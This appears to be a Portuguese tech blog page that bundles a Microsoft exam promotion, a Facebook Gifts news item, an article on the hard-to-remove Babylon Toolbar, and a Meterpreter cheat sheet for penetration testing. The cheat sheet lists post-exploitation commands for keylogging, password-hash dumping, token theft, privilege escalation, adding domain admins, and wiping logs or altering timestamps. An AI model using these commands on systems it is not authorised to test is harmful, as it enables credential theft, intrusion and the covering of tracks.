Second Shot – Segunda chance Exames Microsoft

 

Ela está de volta! A promoção mais aguardada pelos profissionais de TI que planejam ou realizam exames de certificação Microsoft.

A Microsoft, uma das gigantes de TI com o valor dos exames de certificação mais barato é também a que mais incentiva os profissionais a se certificarem, concedendo descontos para compra de pacotes de exames e a segunda chance gratuita, isto é, não passou de primeira, tente novamente na FAIXA!

A Second Shot que está em vigor irá até 31 de maio de 2013!

Está esperando o que?

Cadastre-se aqui para ter o voucher com direito a segunda chance!

Bons estudos!

Meterpreter Commands

Aqui está uma lista com todos os comandos Meterpreter que podem ser usados ​​para a exploração post em um teste de penetração.

help

Open Meterpreter usage help

run scriptname

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter
directory

sysinfo

Show the system information on the remote target

ls

List the files and folders on the target

use priv

Load the privilege extension for extended Meterpreter libraries

ps

Show all running processes and which accounts are associated with each process

migrate PID

Migrate to the specific process ID (PID is the target process ID gained
from the ps command)

use incognito

Load incognito functions. (Used for token stealing and impersonation on
a target machine)

list_tokens -u

List available tokens on the target by user

list_tokens -g

List available tokens on the target by group

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target

steal_token PID

Steal the tokens available for a given process and impersonate that token

drop_token

Stop impersonating the current token

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors

shell

Drop into an interactive shell with all available tokens

execute -f cmd.exe -i

Execute cmd.exe and interact with it

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens

execute -f cmd.exe -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process

rev2self

Revert back to the original user you used to compromise the target

reg command

Interact, create, delete, query, set, and much more in the target’s registry

setdesktop number

Switch to a different screen based on who is logged in

screenshot

Take a screenshot of the target’s screen

upload file

Upload a file to the target

download file

Download a file from the target

keyscan_start

Start sniffing keystrokes on the remote target

keyscan_dump

Dump the remote keys captured on the target

keyscan_stop

Stop sniffing keystrokes on the remote target

getprivs

Get as many privileges as possible on the target

uictl enable keyboard/mouse

Take control of the keyboard and/or mouse

background

Run your current Meterpreter shell in the background

hashdump

Dump all hashes on the target

use sniffer

Load the sniffer module

sniffer_interfaces

List the available interfaces on the target

sniffer_dump interfaceID pcapname

Start sniffing on the remote target

sniffer_start interfaceID packet-buffer

Start sniffing with a specific range for a packet buffer

sniffer_stats interfaceID

Grab statistical information from the interface you are sniffing

sniffer_stop interfaceID

Stop the sniffer

add_user username password -h ip

Add a user on the remote target

add_group_user “Domain Admins” username -h ip

Add a username to the Domain Administrators group on the remote target

clearev

Clear the event log on the target machine

timestomp

Change file attributes, such as creation date (antiforensics measure)

reboot

Reboot the target machine

Facebook permite comprar e mandar presentes pela rede social

Comprar presentes pela internet costuma ser tarefa fácil se você tem o endereço do destinatário. E quando não tem? Recorra a uma página nova, anunciada pelo Facebook hoje, especialmente desenvolvida para a compra imediata de presentes para outras pessoas na rede social. O usuário escolhe o item, confirma o pagamento e escolhe o amigo. Do outro lado da tela, esse amigo completa as informações de entrega.

É o próprio destinatário quem insere o endereço completo para que o correio entregue o produto por lá. Ele ainda troca um item por outro se não tiver gostado do que o amigo queria presentear. Parece-me um tanto rude trocar um presente antes mesmo de recebê-lo, mas é o tipo de inovação que o Facebook Gifts possibilita. Quem não gosta em absoluto de roupas floridas não teria motivo para receber uma dessas antes de solicitar a troca por uma roupa xadrez.

Escolha o presente

A novidade por enquanto vale somente para os Estados Unidos. Outros países devem recebê-la “gradualmente”, de acordo com o Facebook. Entre os presentes previamente cadastrados no sistema há meias femininas, cupcakes e ursinhos de pelúcia, bem como cartões da cafeteria Starbucks para trocar por um frapuccino ou algo assim, como se fosse um voucher.

Pense bem: o Facebook sabe dos aniversários da maioria de seus amigos. Ainda que você esqueça de planejar algo como uma festa, pelo menos terá a chance de avisá-lo sobre o presente. A seção do site com a listagem dos aniversariantes do dia passa a exibir o botão “Dê a ele(a) um presente”. O agrado fica a poucos cliques de distância.

Foi aberto um cadastro para que comerciantes manifestem interesse em vender presentes na rede social. Nós não sabemos qual parcela do valor de venda fica para Mark Zuckerberg e qual vai para o comerciante.

Essa é uma forma interessante de conseguir dinheiro com uma rede social. O Facebook enfrenta dificuldades para mostrar a que veio no âmbito comercial. A rede social com 800 milhões de registrados não gera tanta receita quanto se imaginava ao lançar-se na bolsa de eletrônicos Nasdaq, nos Estados Unidos. Preços de ações caem drasticamente antes de estabilizar. Mark Zuckerberg, o CEO da companhia, teve de se comprometer publicamente a não vender ações pelo período de um ano para demonstrar sua confiança na empresa e aliviar a pressão vinda dos acionistas e investidores.

Fonte:Tecnoblog

Como o Babylon Toolbar entra no seu PC (e por que é difícil removê-lo)

Texto e Testes feito pela Linha Defensiva

 

A Babylon Toolbar é o tipo de software que muita gente tem no PC mas não sabe de onde veio. Essa toolbar é instalada durante a instalação de programas parceiros da Babylon Search, que normalmente avisam sobre as modificações que serão feitas nos navegadores, mas colocam esse aviso em letras pequenas, com o texto quase apagado, e sem explicar claramente que um software adicional será instalado, modificando a página inicial, a página da “nova aba” e o motor de busca dos navegadores para a Babylon Search.

Isso porque o Babylon é incluído na  ”Instalação Padrão”, que já vem marcada por padrão. Os usuários têm a opção de recusar a instalação da toolbar e da Babylon Search, mas para isso é necessário usar a “Instalação Personalizada” e desmarcar todos os itens desejados.

Veja como remover completamente o BabylonSearch →

Desinstalador ineficaz

A Babylon oferece três desinstaladores, tanto para a barra de ferramentas quanto para a Babylon Search, que podem ser acessados através do Painel de Controle.

Esses desinstaladores são totalmente ineficazes e disfuncionais. Nos testes da Linha Defensiva, eles não restauraram a página inicial do navegador para o padrão e também não restauram o motor de busca.

A página inicial pode ser reconfigurada manualmente, mas não o motor de busca e nem a página que será exibida ao abrir uma nova aba (que vai continuar exibindo a Babylon Search). Qualquer modificação manual feita no motor de busca só é válida para a sessão.

Ao reiniciar qualquer navegador1, o motor de busca voltará configurado para a Babylon Search novamente. Desta forma, a Babylon Search patrocina os seus sites parceiros, ao colocá-los em destaque e nas primeiras posições nos resultados de pesquisa.

Numa tentativa de dificultar um processo já disfuncional, um dos desinstaladores, chamado Browser Manager, apresenta um Captcha (imagem com código) antes de iniciar o processo de desinstalação.

No navegador

A Babylon Toolbar pode passar despercebida, pois ela não contém nenhum ícone, nenhum texto, nenhum atalho. No Internet Explorer, aparece apenas como um vão em branco entre as barras de ferramentas.

Detalhe da Babylon Toolbar no Internet Explorer: barra de ferramentas aparenta não mudar nada no navegador. (Foto: Reprodução)

Essa toolbar não executa nenhuma função, não realiza nenhuma modificação no sistema ou nos navegadores, a não ser visualmente, e pode ser facilmente removida. Porém, a sua remoção não restaura as modificações realizadas pela Babylon Search.

Devido a esse comportamento agressivo e intrusivo de instalação e marketing, em 2010 a Microsoft classificou o software da Babylon como malware. Como a Babylon modificou o software, duas semanas depois a Microsoft anunciou que não a considerava mais como malware.

Apesar da Babylon ter voltado a usar o mesmo comportamento que antes a fez cair na classificação de software malicioso, poucos antivírus a consideram assim.